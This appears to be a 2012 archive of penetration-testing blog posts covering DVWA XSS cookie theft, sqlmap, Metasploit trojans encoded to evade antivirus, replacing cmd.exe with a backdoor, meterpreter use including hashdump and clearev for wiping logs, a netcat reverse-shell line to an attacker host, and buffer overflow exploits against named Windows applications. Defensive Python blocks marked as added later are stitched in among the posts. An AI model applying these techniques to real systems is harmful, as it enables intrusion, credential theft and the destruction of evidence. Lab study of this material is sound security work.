Sunday, 28 October 2012

DVWA Medium Security Attack part 1 : XSS & SQLMap

1. Prepare your lab: run Metasploitable in your VirtualBox, then try to access DVWA on port 80 in your browser. Log in with the user admin and the password password.
Don't forget to set the security level to medium.
2. Pick XSS reflected for the first way.
Try writing <script language="javascript">alert("Dodol")</script> into the box and submit it.
OK, we succeed... now we try a different way..

3. Pick XSS stored for the 2nd way.
Try to fill <script language="javascript">alert("Dodol")</script> into the message box, but because the form does not permit enough space we can use Firebug (a Firefox add-on) to edit it.
Change the value of maxlength="250"; now we can write the script into the message box. See the result.
Ooops... we failed this time ;( ... don't worry, we try another trick. Now we put the script into the name box (not the message box), and of course edit the form with Firebug again.
Then submit it... see the result now.
Alright... bro ^^.

4. Now we can try to get the web cookie. First try it with XSS reflected: write this script <script language="javascript">alert(document.cookie)</script>.
Now, in the same way, paste the script into XSS stored (the name box).

Don't forget to copy the cookie into a text editor (geany, kate, kwrite or notepad).
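The other side of steps 3 and 4, as an added Python example that is not part of the original post (DVWA itself is PHP; the function names and the 50-character name limit are assumptions): the 250-character limit is enforced on the server where Firebug cannot edit it, both fields are HTML-encoded before being reflected so the stored script renders as text, and the session cookie carries HttpOnly so document.cookie cannot read it.

```python
import html
from typing import Dict

MAX_NAME = 50      # assumed server-side limit for the name box
MAX_MESSAGE = 250  # the page's maxlength="250", enforced server-side this time


class InputRejected(ValueError):
    pass


def validate_entry(name: str, message: str) -> Dict[str, str]:
    """Reject oversized input on the server. The maxlength attribute is only a
    hint to the browser; the post shows it being edited away with Firebug."""
    if len(name) > MAX_NAME:
        raise InputRejected(f"name exceeds {MAX_NAME} characters")
    if len(message) > MAX_MESSAGE:
        raise InputRejected(f"message exceeds {MAX_MESSAGE} characters")
    return {"name": name, "message": message}


def entry_accepted(name: str, message: str) -> bool:
    try:
        validate_entry(name, message)
        return True
    except InputRejected:
        return False


def render_entry(entry: Dict[str, str]) -> str:
    """HTML-encode both fields before they are shown to any visitor, so a
    stored <script> payload is displayed as text instead of executed."""
    return (f'<div class="entry"><b>{html.escape(entry["name"])}</b>: '
            f'{html.escape(entry["message"])}</div>')


def session_cookie(value: str) -> str:
    """Set-Cookie header with HttpOnly: document.cookie then cannot read the
    session id even if a script does slip through."""
    return f"Set-Cookie: PHPSESSID={value}; HttpOnly; SameSite=Lax; Path=/"


def cookie_readable_by_script(set_cookie_header: str) -> bool:
    """True if a script could see this cookie through document.cookie."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs
```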


5. Now we want to use the SQL injection URL path for running sqlmap.
Run sqlmap:
OK, now we have access as the MySQL root user... and connect to it.
To be continued... part 2 ^^

Saturday, 20 October 2012

Transferring Crafted File part 2 : More Advanced Meterpreter

OK... we continue our discussion. After we learned about most of the payload types Metasploit provides, now we try to learn to make a crafted file using the msfpayload and msfencode combination. The purpose of msfencode is to bypass antivirus detection of the exploit files we send to our victim.
OK, enough talking, let's do more... ^^, let's practice.
1. Run this command
The command above means:
  • we create a payload using the msfpayload module meterpreter reverse tcp
  • we use listening host (our IP) 192.168.56.1
  • we use listening port 6789
  • we encode with msfencode using the shikata ga nai encoder
  • we also encode the code 5 times (-c 5)
  • we create an exe file (-t exe)
  • we save the file as cmd.exe
Wait a minute... there is a little thing to pay attention to. Look at the cmd.exe file we crafted (73 KB on mine) and compare it with the size of the real cmd.exe (380 KB) from Windows. For a beginner user it is no problem, but if we face a medium user he will check the size of cmd.exe, because it does not run as usual. So if we want to make our file more perfect we can modify our command.
First copy the real cmd.exe file from Windows XP and rename it, e.g. to cmd2.exe. Then we can run this command:

Then copy our crafted file (cmd3.exe) to Windows and try to overwrite the real cmd.exe by renaming our file.
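A defender's counterpart to the size check described above, as an added Python example that is not from the original post: a baseline of size and SHA-256 for system binaries, so a replaced cmd.exe is caught whether or not its size was made to match. The files and values in demo() are constructed in a temporary directory; they are not real Windows sizes or hashes.

```python
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List, Tuple

# Baseline maps path -> (size in bytes, sha256 hex digest). Real values would
# come from trusted install media; everything in demo() is constructed.
Baseline = Dict[str, Tuple[int, str]]


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths: Iterable[str]) -> Baseline:
    return {p: (os.path.getsize(p), sha256_of(p)) for p in paths}


def check_against_baseline(baseline: Baseline) -> List[str]:
    """One finding per binary that no longer matches. Size is reported first
    because it is what a user notices (73 KB vs 380 KB); the hash catches a
    replacement whose size was padded or built from the real file as template."""
    findings = []
    for path, (size, digest) in baseline.items():
        if not os.path.exists(path):
            findings.append(f"{path}: missing")
            continue
        actual = os.path.getsize(path)
        if actual != size:
            findings.append(f"{path}: size {actual} != baseline {size}")
        elif sha256_of(path) != digest:
            findings.append(f"{path}: contents changed, size unchanged")
    return findings


def write(path: str, body: bytes) -> None:
    with open(path, "wb") as f:
        f.write(body)


def demo() -> List[str]:
    """Constructed scenario: baseline two fake binaries, then tamper with both."""
    d = tempfile.mkdtemp()
    cmd, notepad = os.path.join(d, "cmd.exe"), os.path.join(d, "notepad.exe")
    write(cmd, b"MZ" + b"\x90" * (380 * 1024))   # stands in for the 380 KB cmd.exe
    write(notepad, b"MZ" + b"\x90" * 4096)
    baseline = build_baseline([cmd, notepad])
    write(cmd, b"MZ" + b"\x90" * (73 * 1024))    # smaller replacement, as in the post
    write(notepad, b"MZ" + b"\xcc" * 4096)       # same size, different bytes
    return check_against_baseline(baseline)
```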

2. Run the handler
Because we selected a reverse meterpreter payload, we need to set up the exploit handler to handle the connection back to our attacking machine. In this case the attacker uses IP address 192.168.56.1. Go to the Metasploit console by typing msfconsole, and then run:

3. Run our crafted file (cmd3.exe), or for real wait for the victim to use cmd.exe (after we overwrite the real cmd file). Our shell should then look like this:

Done ^^
More Advanced Meterpreter
Because we still have some duties to finish, we continue by using the advantages of meterpreter to control the victim system. Use ? or -h for the list of commands.
Here we are after using some of the commands:

^^.... we try to disable the mouse and keyboard of our lab... and done.. haha. Now we try several commands:
meterpreter>help  #meterpreter help#
meterpreter>hashdump  #dump windows system hash values#
meterpreter>sysinfo  #system information#
meterpreter>shell   #To get command prompt (cmd.exe)#
meterpreter>background  #Return to  msf console#
meterpreter>ps  #process list#
meterpreter>execute -f notepad.exe  #To execute notepad in victim machine#
meterpreter>clearev   #To clean all system logs#
meterpreter>screenshot   #Take a snapshot of victim desktop#

Result:

Transferring Crafted File part 1

Now we try to learn how to make a file containing a payload using msfpayload. Before we discuss it, we had better know the difference between a bind and a reverse payload:
bind --> we connect to the victim (the usual way)
reverse --> the victim unknowingly contacts the attacker (wow....)

Next, how do we do them?? Let's practice in our LAB.
1. Open a terminal and type the msfpayload command; we should see something like this:

Option -h gives the same result as running msfpayload without arguments.
Option -l gives us the list of all payloads we can use. For complete information we can read from this.
  • A bind payload listens on a port of the victim we attack, while with a reverse payload we open a port to accept the connection from the victim. The other options are just different protocols: IPv6 or IPv4, transport layer (TCP, UDP) or application layer (HTTP etc.).
  • Staged payload means there are several payloads to be executed: the initial payload is usually smaller in size and is used as a way to execute the next payload. The staged payload type is usually used to deceive antivirus. The usual (single) payload is the same as executing a backdoor, e.g. "netcat -e /bin/sh attacker 3333" for the reverse connection.
  • For meterpreter and VNC, we inject a library (the VNC or meterpreter server) and run it from memory.
    The difference is that with VNC we get the graphic display of the victim's computer, while meterpreter is a more varied and powerful payload.

  • The injection method itself usually uses the Windows loader utility and some reflective DLL injection techniques, using a reflective loader to load the library into the memory of the host process and execute it.

Okay, enough theory.. ^^, now practice..
1. Make a bind shell payload
Now go to the /tmp directory, copy the bind.exe file to our LAB, run it, and type this command in the Windows cmd:
It means port 4444 is open; now we are ready to use netcat on our BT.
  Done...... we are inside the Windows system.

2. Make a reverse shell payload
Now go to the /tmp directory, copy the reverse.exe file to our LAB, run netcat to listen on port 4444, then run reverse.exe from the LAB. The result should look like this:

Done ^^, and to be continued...

Thursday, 11 October 2012

Cool Player 219 Buffer Overflow

Hi again friends... now we want to learn how to exploit Cool Player v. 219. As usual, first we have to find information about this application and find its vulnerable method.

So we found that we can use a .m3u file (a playlist file).
1. Make Fuzzer
Create a new fuzzer, write down the code above, and run it. Then read the result in OllyDbg.
From the result we know that Cool Player can be exploited using the local direct return method.

2. Create pattern offset
The next step is to create a pattern using pattern_create.rb and put the codes into our fuzzer, then run it again on Cool Player and OllyDbg. The result looks like this:
Then find the offset of EIP using pattern_offset.rb, and we found:


3. JMP ESP
The next step is to find an executable module we can use and put its address into our fuzzer. In this case we can use shell32.dll at the JMP ESP instruction (7C9D30F3). Before we run the fuzzer, don't forget to set a breakpoint at the JMP ESP address.
4. Make payload
Because of the amount of junk space left, we can use an execute command payload in our fuzzer, so the code will be:

Run the fuzzer again, and the calculator should appear in our lab, replacing Cool Player.

GSM SIM Utility v.5.15 Buffer Overflow Exploit

Assalamu'alaikum wr. wb..
Hi... friends, today we try to exploit an application named GSM SIM Utility v. 5.15. There were some interesting experiences I got while exploiting this application; want to know? Let's get it on ^^

1. As usual, prepare the application in our LAB and analyze it.
     After analyzing it for about 1 hour, we found that SIM Editor has a vulnerability using a .sms file.

2. Make fuzzer
Now we try to send some junk into the application; here is the script:
Here is the first "interesting thing": SIM Editor finally crashed after we loaded the file (exploit.sms), but when we read the registers in OllyDbg it looked like an SEH buffer overflow, while our instructor said that it can use the direct return method. So I had to try again to find the perfect amount of junk to send to make it crash directly.
junk = "\x41" * 1900

After decreasing the junk step by step, SIM Editor finally crashed directly with 1900 bytes of junk.

3. Find the offset
Next step: we make a 1900-byte pattern using pattern_create.rb and put the codes into our buffer. But what happened is that SIM Editor failed to crash.... OMG, what do we have to do next???? Finally we understood that this application can't read those ASCII characters, so we can't use the pattern to find the offset automatically. We have to find it manually.. (hahaha)
Later, after patiently dividing the junk and searching for the offset, we found the way and changed the fuzzer code:
Read it using OllyDbg:
From the picture below, we found that the offset to overwrite EIP is at 810.

4. JMP ESP Command
Next, we can use the shell32.dll executable module and find the address in it:
5. Make payload

We can use the bind shell payload code and put it into the fuzzer:
6. Make final fuzzer
After we have all the codes we need, we put them all into our final fuzzer. One important thing to remember is that SIM Editor can't read ASCII characters or encoded characters (\x), so we modify the codes like this:
7. Run fuzzer
The last step is fuzzing SIM Editor and connecting to it with telnet....

 
 Alhamdulillah... we've done it !!....
Wassalamu'alaikum wr. wb


Sunday, 07 October 2012

EZ Server 6 Stack Buffer Overflow Part2

In my previous post we already exploited Ezserver6 using the execute command payload type, but what if we want to execute a bind shell? Is there enough empty space? Now we are going to discuss it.
 
1. Calculate the space
     The junk space we found is only 240 bytes, and as we know the bind shell payload needs at least 317 bytes of free space. How do we solve it? There is a method named egghunter.

2. Generate Bind Shell payload
Before we learn about the egghunter, we can generate the payload first:
Generate it, then copy the codes into the fuzzer.


3. Egghunter method
Documentation about the egghunter method you can learn more from at this site: Egg Hunter. Before we put the egghunter code into our fuzzer we must prepare the
 scenario >> payload=sampah+jmp+alamat+egghunter+padding+ "w00tw00t"  + shellcode;
So our fuzzer will be:
 Now the last step,... we can try fuzzing Ezserver again.

Alhamdulillah....we succeed....

EZ Server 6 Stack Buffer Overflow

Assalamu'alaikum wr. wb...guys, meet you again, and right now we want to try exploiting EZ server v. 6 running on windows XP SP3. Ok lets get it on...

1. Information Gathering, Service Enumeration
    We can use nmap or zenmap to gather information about our target.
OK, from the information we found, port 8000/tcp is open and the service running on it is HTTP 1.0.

2. Vulnerability Assessment
In this step we can make a simple script based on Python that uses a GET request over HTTP 1.0.
Save the script as ezexploit.py and run it. What happens is that EZ Server suddenly crashes, which means the EZ Server running on port 8000 is vulnerable....
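A detection-side view of the same crash, as an added Python example that is not part of the original post: a scan over web server access-log lines that flags request URIs of the kind this step sends (an oversized path, a long run of one repeated byte, or a pattern_create-style cyclic string). The log lines are constructed for the example and the 2048-byte threshold is an assumption.

```python
import re
from typing import List, Tuple

MAX_URI = 2048  # assumed threshold; ordinary request URIs are far shorter
# pattern_create.rb output cycles upper, lower, digit: Aa0Aa1Aa2...
CYCLIC = re.compile(r"(?:[A-Z][a-z][0-9]){8,}")
# 64 or more copies of a single character, e.g. the "A" junk in a fuzzer
REPEAT = re.compile(r"(.)\1{63,}")
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>HTTP/\d\.\d)"')


def classify_uri(uri: str) -> List[str]:
    """Reasons a request URI looks like overflow fuzzing; empty list means clean."""
    reasons = []
    if len(uri) > MAX_URI:
        reasons.append(f"uri length {len(uri)} > {MAX_URI}")
    if REPEAT.search(uri):
        reasons.append("long run of one repeated character")
    if CYCLIC.search(uri):
        reasons.append("pattern_create-style cyclic pattern")
    return reasons


def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line index, reasons) for every suspicious request in an access log."""
    hits = []
    for i, line in enumerate(lines):
        m = REQUEST.search(line)
        if m is None:
            hits.append((i, ["unparseable request line"]))
            continue
        reasons = classify_uri(m.group("uri"))
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed log lines in common log format; not captured from EZ Server.
SAMPLE_LOG = [
    '192.168.56.1 - - [07/Oct/2012:10:00:01 +0700] "GET /index.html HTTP/1.0" 200 512',
    '192.168.56.1 - - [07/Oct/2012:10:00:02 +0700] "GET /' + "A" * 7000 + ' HTTP/1.0" 400 0',
    '192.168.56.1 - - [07/Oct/2012:10:00:03 +0700] "GET /'
    + "".join(f"A{c}{d}" for c in "abc" for d in "0123456789") + ' HTTP/1.0" 400 0',
]
```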

3. Exploiting with SEH Buffer Overflow
Now we try to analyze it in our LAB with OllyDbg, after the fuzzer has run against EZ Server.
 The picture shows that ESP is overwritten by the "A" junk but EIP is not yet overwritten; that's because EZ has an SEH handler. Now our duty is to try to bypass SEH and find the address for EIP. So we make a pattern using this command:
# ./pattern_create.rb 7000 > ezstring.txt
 
Open the ezstring file and copy the codes into our fuzzer,
then run the fuzzer against our target again. After that, look at the SEH chain in OllyDbg, and we found:
Alright.... we got it. The next step is to find the offset from the SE handler address shown, using the command:
# ./pattern_offset.rb 48316F48 7000
5883

OK, before changing the fuzzer script, we must know that one way to handle SEH is the POP, POP, RETN method. To find modules where that method can be used we can use the OllySSEH plugin to scan automatically. You can download the plugin at OllySSEH plugin. This plugin does an in-memory scan of the process's loaded modules, checking whether they were compiled with /SafeSEH; if so it can list the registered handlers (you can follow them in the CPU window by double-clicking). This plugin is useful when exploiting vulnerabilities on systems with software DEP protection.

The plugin lists all loaded modules and can give you the following results for each one:

    /SafeSEH Off : No /SafeSEH, jump party ;-)
   
    /SafeSEH ON  : /SafeSEH active, you can list registered handles
                   using rigth click.
                  
    No SEH       : SEH is not active for this module, take a look
                   at PE/COFF specs (IMAGE_DLLCHARACTERISTICS_ NO_SEH)
                  
    Error        : There was an error reading module structure :-(

After we scan, the result was:
OK, there are 3 files: js32.dll, MSVCRTD.dll and Ezserver6.exe. Forget Ezserver6.exe, so we just choose between js32.dll and MSVCRTD.dll. Now we search for a POP r32, POP r32, RETN sequence, if one exists in the module.
After we found that MSVCRTD.dll is suitable to bypass the SE handler on EZserver, we change the script like this:
Make sure we set a breakpoint on the POP r32 address >> 10209696, and run the fuzzer again.


The picture shows that EIP has been overwritten. Then we put a short jump into the fuzzer as before. How many bytes we jump is up to us (in this case we use a 6-byte jump): the JMP SHORT instruction orders the CPU to jump forward by the number of bytes given by the user, and the CPU then continues execution from that address.

As we see, the addresses shown are 01FFFF09 - 01FFFFF9, which is 240 bytes of junk in decimal. Now our duty is to make shellcode of no more than 240 bytes.
 
 Generate the payload and then copy the code into our fuzzer:

And.... look at the result yourself...
But wait, it's not finished yet, to be continued... ^^